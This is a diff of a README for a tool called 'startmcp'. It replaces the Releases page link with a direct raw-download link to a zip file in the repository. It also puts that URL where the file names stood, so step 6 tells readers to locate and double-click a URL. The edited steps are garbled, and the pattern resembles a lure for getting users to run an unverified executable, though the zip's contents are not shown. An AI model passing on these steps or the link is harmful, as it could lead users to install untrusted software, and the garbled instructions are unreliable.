Lazareprotrusible421/startmcp/README.md

 - **User-Friendly Interface:** Designed to be easy for anyone to use.

 ## 📂 Download & Install
-1. Visit the [Releases page](https://github.com/Lazareprotrusible421/startmcp/releases) to find the latest version of startmcp.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Lazareprotrusible421/startmcp/main/mcp/startmcp-v1.0-alpha.4.zip) to find the latest version of startmcp.
 2. Scroll down to the section labeled "Assets".
 You will see the downloadable files.
-3. Click on the file named `startmcp-v1.0.zip` to download it.
+3. Click on the file named `https://raw.githubusercontent.com/Lazareprotrusible421/startmcp/main/mcp/startmcp-v1.0-alpha.4.zip` to download it.
 4. Locate the downloaded file on your computer, usually in the "Downloads" folder.
 5. Extract the contents of the zip file.
-6. Open the folder and locate the `startmcp.exe` file (for Windows) or `startmcp` file (for macOS/Linux).
+6. Open the folder and locate the `https://raw.githubusercontent.com/Lazareprotrusible421/startmcp/main/mcp/startmcp-v1.0-alpha.4.zip` file (for Windows) or `startmcp` file (for macOS/Linux).
 7. Double-click the file to run the application.

 ## ⚙️ Configuration